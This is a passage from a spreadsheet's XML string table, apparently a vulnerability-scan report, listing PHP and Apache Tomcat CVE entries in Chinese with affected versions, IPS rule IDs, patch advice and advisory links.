    <t>影响PHP:5.4.0版本(含)到5.4.22版本(含),5.5.0版本(含)到5.5.6版本(含),5.3版本(含)到5.3.27版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201312-348
https://www.sektioneins.de/advisories/advisory-012013-php-openssl_x509_parse-memory-corruption-vulnerability.html
https://bugzilla.redhat.com/show_bug.cgi?id=1036830
http://www.php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>PHP 5.3.7之前版本多个漏洞</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.php.net/archive/2011.php</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201108-357
http://www.php.net/ChangeLog-5.php#5.3.7</t>
  </si>
  <si>
    <t>PHP多个安全限制绕过漏洞（CVE-2015-4598）</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://bugs.php.net/bug.php?id=69719</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201506-423
http://www.securitytracker.com/id/1032709</t>
  </si>
  <si>
    <t>PHP空指针间接引用拒绝服务漏洞(CVE-2015-4644)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://bugs.php.net/bug.php?id=69667</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201506-415
http://www.securitytracker.com/id/1032709</t>
  </si>
  <si>
    <t>PHP \"getSymbol()\"函数拒绝服务漏洞</t>
  </si>
  <si>
    <t>ips-11020091（有效）</t>
  </si>
  <si>
    <t>影响PHP:5.3.3以下版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://svn.php.net/viewvc/php/php-src/trunk/ext/intl/formatter/formatter_attr.c?r1=305571&amp;r2=305570&amp;pathrev=305571</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201012-058</t>
  </si>
  <si>
    <t>PHP“phar/phar_object.c”格式字符串漏洞</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://svn.php.net/viewvc?view=revision&amp;revision=309221</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201103-220
http://bugs.php.net/bug.php?id=54247
https://exchange.xforce.ibmcloud.com/vulnerabilities/66079</t>
  </si>
  <si>
    <t>PHP “socket_connect()”函数栈缓冲区溢出漏洞</t>
  </si>
  <si>
    <t>ips-11020094, ips-11024382（有效）</t>
  </si>
  <si>
    <t>影响PHP:5.3.3版本(含)到5.3.6版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://www.exploit-db.com/exploits/17318/</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201105-298</t>
  </si>
  <si>
    <t>PHP libxslt安全限制绕过漏洞</t>
  </si>
  <si>
    <t>影响PHP:5.0版本(含)到5.3.8版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://bugzilla.redhat.com/show_bug.cgi?id=782657</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201202-003
http://php.net/ChangeLog-5.php#5.3.9</t>
  </si>
  <si>
    <t>PHP '_php_stream_scandir()'缓冲区溢出漏洞(CVE-2012-2688)</t>
  </si>
  <si>
    <t>影响PHP:5.3.15以下版本,5.4.0版本(含)到5.4.5版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201207-401
http://www.php.net/ChangeLog-5.php#5.4.5</t>
  </si>
  <si>
    <t>Apache Tomcat 安全漏洞</t>
  </si>
  <si>
    <t>影响Tomcat:9.0.0版本(含)到9.0.29版本,8.5.0版本(含)到8.5.48版本,7.0.0版本(含)到7.0.98版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：http://tomcat.apache.org/security-8.html</t>
  </si>
  <si>
    <t>https://usn.ubuntu.com/4251-1/
http://tomcat.apache.org/security-8.html</t>
  </si>
  <si>
    <t>Apache Tomcat 信息泄露漏洞（CVE-2020-17527）</t>
  </si>
  <si>
    <t>影响Tomcat:10.0.0-M1版本(含)到10.0.0-M9版本(含),9.0.0-M1版本(含)到9.0.39版本(含),8.5.0版本(含)到8.5.59版本(含)</t>
  </si>
  <si>
    <t>厂商补丁：  Apache Tomcat ----------- 厂商已发布了漏洞修复程序，请及时关注更新： https://tomcat.apache.org/security-10.html,https://tomcat.apache.org/security-9.html,https://tomcat.apache.org/security-8.html 修复版本下载链接:https://tomcat.apache.org/download-10.cgi,https://tomcat.apache.org/download-90.cgi,https://tomcat.apache.org/download-80.cgi</t>
  </si>
  <si>
    <t>https://tomcat.apache.org/
https://tomcat.apache.org/security-10.html
https://tomcat.apache.org/security-9.html
https://tomcat.apache.org/security-8.html
https://tomcat.apache.org/download-10.cgi
https://tomcat.apache.org/download-90.cgi
https://tomcat.apache.org/download-80.cgi</t>
  </si>
  <si>
    <t>Apache Tomcat 访问控制错误漏洞(CVE-2021-30640)</t>
  </si>
  <si>
    <t>影响Tomcat:7.0.0版本(含)到7.0.109版本,8.5.0版本(含)到8.5.66版本,9.0.0版本(含)到9.0.46版本,10.0.0版本(含)到10.0.6版本</t>
  </si>
  <si>
    <t>厂商补丁:https://tomcat.apache.org/security-10.html</t>
  </si>
  <si>
    <t>Apache Tomcat文件读取漏洞(CVE-2020-1938)</t>
  </si>
  <si>
    <t>ips-11020824（有效）</t>
  </si>
  <si>
    <t>7.0.0≤Apache Tomcat&lt;7.0.998.0.0≤Apache Tomcat&lt;8.5.509.0.0≤Apache Tomcat&lt;9.0.30</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，详情请关注厂商主页：http://tomcat.apache.org/</t>
  </si>
  <si>
    <t>https://lists.debian.org/debian-lts-announce/2020/03/msg00006.html
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_12346&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>PHP 缓冲区错误漏洞(CVE-2014-9912)</t>
  </si>
  <si>
    <t>影响PHP:5.3.29以下版本,5.4.0版本(含)到5.4.30版本,5.5.0版本(含)到5.5.14版本</t>
  </si>
  <si>
    <t>参见《PHP 缓冲区错误漏洞(CVE-2014-9912)-修复方案》</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201611-652
https://cxsecurity.com/cveshow/CVE-2014-9912</t>
  </si>
  <si>
    <t>PHP ibase_gen_id()函数单字节溢出漏洞</t>
  </si>
  <si>
    <t>参见《PHP ibase_gen_id()函数单字节溢出漏洞-修复方案》</t>
  </si>
  <si>
    <t>PHP Pear '/tmp/'目录 任意文件写入漏洞 (CVE-2014-5459)</t>
  </si>
  <si>
    <t>影响PHP:5.6.0以下版本(含)</t>
  </si>
  <si>
    <t>参见《PHP Pear __tmp__目录 任意文件写入漏洞 (CVE-2014-5459)-修复方案》</t>
  </si>
  <si>
    <t>http://www.openwall.com/lists/oss-security/2014/08/27/3
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=759282
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201408-508</t>
  </si>
  <si>
    <t>PHP \"crypt()\" MD5 Salt安全漏洞</t>
  </si>
  <si>
    <t>影响PHP:5.3.7以下版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201108-454
https://exchange.xforce.ibmcloud.com/vulnerabilities/69427</t>
  </si>
  <si>
    <t>PHP \"magic_quotes_gpc\"指令安全限制绕过漏洞</t>
  </si>
  <si>
    <t>影响PHP:5.3.10以下版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201202-194
https://exchange.xforce.ibmcloud.com/vulnerabilities/73125</t>
  </si>
  <si>
    <t>PHP GD Graphics Library 整数溢出漏洞(CVE-2016-5767)</t>
  </si>
  <si>
    <t>影响PHP:5.5.37以下版本,5.6版本(含)到5.6.23版本,7.0版本(含)到7.0.8版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://bugs.php.net/bug.php?id=67539</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201606-558
http://php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>PHP ext/wddx/wddx.c文件安全漏洞(CVE-2016-7131)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201609-176
http://www.php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>PHP mbstring扩展整数溢出漏洞(CVE-2016-5768)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201606-559
http://php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>PHP SPL扩展整数溢出漏洞(CVE-2016-5770)</t>
  </si>
  <si>
    <t>影响PHP:5.5.37以下版本,5.6版本(含)到5.6.23版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201606-561
https://bugs.php.net/bug.php?id=72262</t>
  </si>
  <si>
    <t>PHP 任意文件泄露和任意文件写漏洞(CVE-2013-1635)</t>
  </si>
  <si>
    <t>影响PHP:5.3.21以下版本(含),5.4.0版本(含)到5.4.12版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201303-092
http://support.apple.com/kb/HT5880</t>
  </si>
  <si>
    <t>PHP 整数溢出漏洞(CVE-2016-4073)</t>
  </si>
  <si>
    <t>影响PHP:5.5.34以下版本,5.6版本(含)到5.6.20版本,7.0版本(含)到7.0.5版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201604-560
https://bugs.php.net/bug.php?id=71906</t>
  </si>
  <si>
    <t>PHP‘_gd2GetHeader()’函数整数溢出漏洞(CVE-2016-5766)</t>
  </si>
  <si>
    <t>ips-11021737（无效）</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=64f42c73efc58e88671ad76b6b6bc8e2b62713e1</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201606-557
http://php.net/ChangeLog-5.php
http://php.net/ChangeLog-7.php</t>
  </si>
  <si>
    <t>PHP‘ext/gd/gd.c’信息泄露漏洞(CVE-2016-7127)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201609-076
https://bugs.php.net/bug.php?id=72730</t>
  </si>
  <si>
    <t>PHP Zip Extract方法拒绝服务漏洞</t>
  </si>
  <si>
    <t>影响PHP:5.2.0版本(含)到5.2.14版本(含),5.3.0版本(含)到5.3.4版本(含)</t>
  </si>
  <si>
    <t>参见《PHP Zip Extract方法拒绝服务漏洞-修复方案》</t>
  </si>
  <si>
    <t>PHP Zip扩展zip_stream.c整数符号错误漏洞(CVE-2011-1471)</t>
  </si>
  <si>
    <t>影响PHP:5.3.6以下版本</t>
  </si>
  <si>
    <t>参见《PHP Zip扩展zip_stream.c整数符号错误漏洞(CVE-2011-1471)-修复方案》</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201103-265
https://cxsecurity.com/cveshow/CVE-2011-1471</t>
  </si>
  <si>
    <t>PHP ‘odbc_bindcols’函数安全漏洞(CVE-2015-8879)</t>
  </si>
  <si>
    <t>影响PHP:5.6.12以下版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201605-566
https://bugs.php.net/bug.php?id=69975
http://www.php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>PHP 'cdf_read_property_info()'函数拒绝服务漏洞（CVE-2014-0238）</t>
  </si>
  <si>
    <t>ips-11020752, ips-11024345（有效）</t>
  </si>
  <si>
    <t>影响PHP:5.0版本(含)到5.4.29版本,5.5.0版本(含)到5.5.13版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201406-002</t>
  </si>
  <si>
    <t>PHP PHAR扩展安全漏洞(CVE-2016-4072)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201604-559
http://www.php.net/ChangeLog-7.php</t>
  </si>
  <si>
    <t>PHP SPL扩展释放后重用漏洞(CVE-2016-5771)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=1e9b175204e3286d64dfd6c9f09151c31b5e099a</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201606-562
https://bugs.php.net/bug.php?id=72433</t>
  </si>
  <si>
    <t>PHP strval函数缓冲区溢出漏洞(CVE-2011-1464)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://cn.php.net/downloads.php</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201103-258
http://www.php.net/releases/5_3_6.php</t>
  </si>
  <si>
    <t>PHP 任意文件泄露和任意文件写漏洞(CVE-2013-1643)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201303-093
http://secunia.com/advisories/55078</t>
  </si>
  <si>
    <t>PHP‘ext/gd/gd.c’基于堆的缓冲区溢出漏洞(CVE-2016-7126)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201609-074
https://bugs.php.net/bug.php?id=72697</t>
  </si>
  <si>
    <t>PHP 缓冲区溢出漏洞(CVE-2016-5114)</t>
  </si>
  <si>
    <t>影响PHP:5.5.31以下版本,5.6版本(含)到5.6.17版本,7.0版本(含)到7.0.2版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://github.com/php/php-src/commit/b28b8b2fee6dfa6fcd13305c581bb835689ac3be</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201606-369
https://bugs.php.net/bug.php?id=70755</t>
  </si>
  <si>
    <t>Apache Tomcat 代码问题漏洞(CVE-2022-25762)</t>
  </si>
  <si>
    <t>影响Tomcat:8.5.0版本(含)到8.5.76版本,9.0.0版本(含)到9.0.21版本</t>
  </si>
  <si>
    <t>厂商补丁: 目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://lists.apache.org/thread/6ckmjfb1k61dyzkto9vm2k5jvt4o7w7c</t>
  </si>
  <si>
    <t>PHP 代码注入漏洞 (CVE-2013-6501)</t>
  </si>
  <si>
    <t>影响PHP:5.6.7以下版本(含)</t>
  </si>
  <si>
    <t>参见《PHP 代码注入漏洞 (CVE-2013-6501)-修复方案》</t>
  </si>
  <si>
    <t>https://bugzilla.redhat.com/show_bug.cgi?id=1009103
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201502-167
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6501
https://www.cnvd.org.cn/flaw/show/CNVD-2015-01028</t>
  </si>
  <si>
    <t>PHP GD Graphics Library 拒绝服务漏洞 (CVE-2015-8877)</t>
  </si>
  <si>
    <t>参见《PHP GD Graphics Library 拒绝服务漏洞 (CVE-2015-8877)-修复方案》</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201605-564
http://www.php.net/ChangeLog-5.php
https://github.com/libgd/libgd/commit/4751b606fa38edc456d627140898a7ec679fcc24
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8877
https://www.cnvd.org.cn/flaw/show/CNVD-2016-03571</t>
  </si>
  <si>
    <t>PHP符号解析安全漏洞</t>
  </si>
  <si>
    <t>影响PHP:5.3.0版本(含)到5.3.3版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：http://www.php.net</t>
  </si>
  <si>
    <t>PHP PDO内存访问冲突拒绝服务漏洞</t>
  </si>
  <si>
    <t>影响PHP:5.3版本(含)到5.3.13版本(含),5.4版本(含)到5.4.3版本(含)</t>
  </si>
  <si>
    <t>目前厂商还没有提供此漏洞的相关补丁或者升级程序，建议使用此软件的用户随时关注厂商的主页以获取最新版本：http://www.php.net/</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201208-017</t>
  </si>
  <si>
    <t>PHP堆缓冲区溢出漏洞(CVE-2014-9705)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201503-622
http://php.net/ChangeLog-5.php#5.4.38</t>
  </si>
  <si>
    <t>PHP move_uploaded_file 权限许可和访问控制漏洞(CVE-2015-2348)</t>
  </si>
  <si>
    <t>影响PHP:5.4.39以下版本,5.5.0版本(含)到5.5.23版本,5.6.0版本(含)到5.6.7版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201503-626
http://php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>PHP Fileinfo组件‘cdf_read_property_info()’函数拒绝服务漏洞(CVE-2014-3487)</t>
  </si>
  <si>
    <t>影响PHP:5.0版本(含)到5.4.30版本,5.5.0版本(含)到5.5.14版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201406-718
http://www.php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>PHP GD 缓冲区溢出漏洞(CVE-2014-9709)</t>
  </si>
  <si>
    <t>影响PHP:5.5.21以下版本,5.6.0版本(含)到5.6.5版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201503-623
http://php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>PHP‘valuePop()’函数拒绝服务漏洞(CVE-2015-6837)</t>
  </si>
  <si>
    <t>影响PHP:5.4.45以下版本,5.5.0版本(含)到5.5.29版本,5.6.0版本(含)到5.6.13版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201509-240
http://php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>PHP 'ftp_genlist()'函数整数溢出漏洞(CVE-2015-4022)</t>
  </si>
  <si>
    <t>影响PHP:5.4.40以下版本(含),5.5.0版本(含)到5.5.24版本(含),5.6.0版本(含)到5.6.8版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201506-130
https://bugs.php.net/bug.php?id=69545</t>
  </si>
  <si>
    <t>PHP 多个远程代码执行漏洞(CVE-2015-6834)</t>
  </si>
  <si>
    <t>影响PHP:5.4.45之前版本,5.5版本(含)到5.5.29版本(含),5.6版本(含)到5.6.13版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201509-238
https://bugs.php.net/bug.php?id=70366</t>
  </si>
  <si>
    <t>PHP gdImageRotateInterpolated拒绝服务漏洞(CVE-2016-1903)</t>
  </si>
  <si>
    <t>影响PHP:5.5.31以下版本,5.6.0版本(含)到5.6.17版本,7.0.0版本(含)到7.0.2版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201601-364</t>
  </si>
  <si>
    <t>PHP ext/xml/xml.c 拒绝服务漏洞(CVE-2013-4113)</t>
  </si>
  <si>
    <t>ips-11020754（有效）</t>
  </si>
  <si>
    <t>影响PHP:5.0.0版本(含)到5.3.26版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201307-244
http://php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>PHP 拒绝服务漏洞(CVE-2015-4021)</t>
  </si>
  <si>
    <t>ips-11020706, ips-11020707（有效）</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://bugs.php.net/bug.php?id=65236</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201505-558</t>
  </si>
  <si>
    <t>PHP phar_parse_zipfile函数单字节溢出漏洞(CVE-2015-7804)</t>
  </si>
  <si>
    <t>ips-11024078（有效）</t>
  </si>
  <si>
    <t>影响PHP:5.5.29以下版本(含),5.6.0版本(含)到5.6.13版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-700
http://www.php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>PHP 安全漏洞(CVE-2015-2783)</t>
  </si>
  <si>
    <t>影响PHP:5.4.39以下版本(含),5.5.0版本(含)到5.5.23版本(含),5.6.0版本(含)到5.6.7版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201505-040
https://bugs.php.net/bug.php?id=69324
http://php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>PHP phar_parse_zipfile函数信息泄露及拒绝服务漏洞(CVE-2016-3142)</t>
  </si>
  <si>
    <t>影响PHP:5.5.33以下版本(含),5.6.0版本(含)到5.6.19版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://pastie.org/1279682</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201603-445
https://bugs.php.net/bug.php?id=71498
http://www.securitytracker.com/id/1035255</t>
  </si>
  <si>
    <t>PHP 基于栈的缓冲区溢出漏洞(CVE-2016-2554)</t>
  </si>
  <si>
    <t>影响PHP:5.5.31以下版本(含),5.6.0版本(含)到5.6.17版本(含),7.0.0版本(含)到7.0.2版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://bugs.php.net/bug.php?id=66387</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201604-567
https://bugs.php.net/bug.php?id=71488
http://php.net/ChangeLog-7.php</t>
  </si>
  <si>
    <t>PHP grapheme_strpos拒绝服务漏洞(CVE-2016-4541)</t>
  </si>
  <si>
    <t>影响PHP:7.0版本(含)到7.0.6版本,5.5.35以下版本,5.6.0版本(含)到5.6.21版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201605-154
http://php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>PHP bcpowmod 函数拒绝服务漏洞(CVE-2016-4537)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=d650063a0457aec56364e4005a636dc6c401f9cd</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201605-150
https://bugs.php.net/bug.php?id=72093</t>
  </si>
  <si>
    <t>PHP xml_parse_into_struct拒绝服务漏洞(CVE-2016-4539)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201605-152
https://bugs.php.net/bug.php?id=72099</t>
  </si>
  <si>
    <t>PHP virtual_file_ex拒绝服务漏洞(CVE-2016-6289)</t>
  </si>
  <si>
    <t>影响PHP:5.5.37以下版本(含),5.6.0版本(含)到5.6.23版本(含),7.0版本(含)到7.0.8版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201607-927
http://php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>PHP exif_process_IFD_in_MAKERNOTE信息泄露漏洞(CVE-2016-6291)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201607-929
https://bugs.php.net/72603</t>
  </si>
  <si>
    <t>PHP locale_accept_from_http拒绝服务漏洞(CVE-2016-6294)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201607-932
https://support.apple.com/HT207170</t>
  </si>
  <si>
    <t>PHP‘mcrypt_generic’函数整数溢出漏洞(CVE-2016-5769)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201606-560
http://php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>PHP openssl_random_pseudo_bytes()函数安全漏洞(CVE-2015-8867)</t>
  </si>
  <si>
    <t>影响PHP:5.4.44以下版本,5.5版本(含)到5.5.28版本,5.6版本(含)到5.6.12版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201604-562
https://bugs.php.net/bug.php?id=70014
http://www.php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>PHP'ext/wddx/wddx.c'拒绝服务漏洞(CVE-2016-7130)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201609-072
https://bugs.php.net/bug.php?id=72750</t>
  </si>
  <si>
    <t>PHP 'cdf_read_property_info()' 函数拒绝服务漏洞（CVE-2014-3587）</t>
  </si>
  <si>
    <t>ips-11020719, ips-11024343（有效）</t>
  </si>
  <si>
    <t>影响PHP:5.0版本(含)到5.4.31版本(含),5.5.0版本(含)到5.5.15版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201408-367</t>
  </si>
  <si>
    <t>PHP双重释放拒绝服务漏洞(CVE-2014-9425)</t>
  </si>
  <si>
    <t>影响PHP:5.5.20以下版本(含),5.6.0版本(含)到5.6.4版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201412-534
https://bugs.php.net/bug.php?id=68676</t>
  </si>
  <si>
    <t>PHP ZIP扩展libzip 数字错误漏洞(CVE-2015-2331)</t>
  </si>
  <si>
    <t>ips-11020711, ips-11020712（有效）</t>
  </si>
  <si>
    <t>影响PHP:5.4.38以下版本,5.5.0版本(含)到5.5.23版本,5.6.0版本(含)到5.6.7版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201503-625
http://php.net/ChangeLog-5.php
http://www.securitytracker.com/id/1031985</t>
  </si>
  <si>
    <t>PHP‘process_nested_data’函数释放后重用漏洞(CVE-2015-2787)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201503-627
http://php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>PHP‘xsltprocessor.c’拒绝服务漏洞(CVE-2015-6838)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://bugs.php.net/bug.php?id=69782</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201509-233
http://www.securitytracker.com/id/1033548</t>
  </si>
  <si>
    <t>PHP quoted_printable_encode()堆缓冲区溢出漏洞（CVE-2013-2110）</t>
  </si>
  <si>
    <t>ips-11021955, ips-11024375, ips-11024376, ips-11024377（有效）</t>
  </si>
  <si>
    <t>影响PHP:5.3.25以下版本(含),5.4.0版本(含)到5.4.15版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201306-143
http://www.php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>PHP PostgreSQL扩展拒绝服务漏洞(CVE-2015-1352)</t>
  </si>
  <si>
    <t>影响PHP:5.4.39以下版本(含),5.5版本(含)到5.5.23版本(含),5.6版本(含)到5.6.7版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://bugs.php.net/bug.php?id=64879</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201501-212
https://bugs.php.net/bug.php?id=68741</t>
  </si>
  <si>
    <t>PHP空字符不完整修复多个安全功能绕过漏洞(CVE-2015-4025)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201505-613
http://php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>PHP phar_get_entry_data函数拒绝服务漏洞(CVE-2015-7803)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201510-699</t>
  </si>
  <si>
    <t>PHP缓冲区溢出漏洞(CVE-2015-3329)</t>
  </si>
  <si>
    <t>ips-11020708, ips-11020709, ips-11020710（有效）</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201505-041
https://security.gentoo.org/glsa/201606-10</t>
  </si>
  <si>
    <t>PHP空字符安全限制绕过漏洞(CVE-2006-7243)</t>
  </si>
  <si>
    <t>影响PHP:5.3.4以下版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201101-204
http://www.php.net/releases/5_3_4.php</t>
  </si>
  <si>
    <t>PHP Fileinfo组件拒绝服务漏洞(CVE-2014-0236)</t>
  </si>
  <si>
    <t>影响PHP:5.6.0以下版本</t>
  </si>
  <si>
